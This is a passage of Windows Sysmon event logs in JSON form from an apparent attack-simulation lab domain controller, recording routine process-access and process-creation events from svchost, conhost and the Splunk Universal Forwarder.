C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.235","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3430,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.235\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.235","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3431,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.235\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.235","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3432,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.235\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.235","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3433,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.235\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.235","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3434,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.235\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.235","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3435,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.235\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1FF5-5F25-0000-00105A720500}\r\nTargetProcessId: 4800\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.235","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1FF5-5F25-0000-00105A720500}","TargetProcessId":"4800","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3436,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.454\r\nSourceProcessGUID: {41C8662E-1FF5-5F25-0000-00105A720500}\r\nSourceProcessId: 4800\r\nSourceThreadId: 4820\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.454","SourceProcessGUID":"{41C8662E-1FF5-5F25-0000-00105A720500}","SourceProcessId":"4800","SourceThreadId":"4820","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+116e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f344c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+f2a91|C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE+19fdb50|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:33","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":3437,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:33.546\r\nProcessGuid: {41C8662E-1FF5-5F25-0000-00106D760500}\r\nProcessId: 3064\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nFileVersion: 8.0.2\r\nDescription: btool\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: btool.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B\r\nParentProcessGuid: {41C8662E-1FF4-5F25-0000-0010596B0500}\r\nParentProcessId: 2364\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes --no-prompt ","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:55:33.546","ProcessGuid":"{41C8662E-1FF5-5F25-0000-00106D760500}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","FileVersion":"8.0.2","Description":"btool","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"btool.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" validate-strptime --log-warnings","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B","ParentProcessGuid":"{41C8662E-1FF4-5F25-0000-0010596B0500}","ParentProcessId":"2364","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe\"  _internal pre-flight-checks --answer-yes 